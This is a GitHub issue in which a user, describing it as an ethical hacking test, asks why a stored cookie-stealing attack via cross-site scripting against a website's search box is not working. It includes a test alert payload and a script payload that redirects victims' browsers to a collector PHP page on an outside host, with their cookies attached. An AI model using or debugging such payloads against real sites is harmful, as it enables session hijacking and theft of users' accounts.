Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

XSS help #17

Open
Chrislinuxos opened this issue Dec 8, 2023 · 0 comments
Open

XSS help #17

Chrislinuxos opened this issue Dec 8, 2023 · 0 comments

Comments

@Chrislinuxos
Copy link

I'm doing an ethical hacking test, I tested an XSS payload : <script>alert("xss")</script> on a website, and the pop-up appears, so I want to collect user cookie

I created a getcookie.php file and a cookies.txt file and and I uploaded both files to a hosting server,
I placed the two files in the htdocs folder, which now contains index.html, getcookie.php and a cookies.txt

This is the getcookie.php file:

When I try this in the search box: : <script>document.location="http://website.com/getcookie.php?c="+document.cookie;</script>

I get this URL:
https://website2/search/?section=all&query=<script>document.location="http:SLASHSLASHwebsite.comSLASHgetcookie.php?c="+document.cookie;&path=SLASH

and I don't see any cookies in cookies.txt

What am I doing wrong, please? I've tried lot of payloads in the past 3 days but no results,
when I type http://website.com/getcookie.php in a new tab, I get the cookie but it's empty, I get this text : Cookie:

Thank you

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

1 participant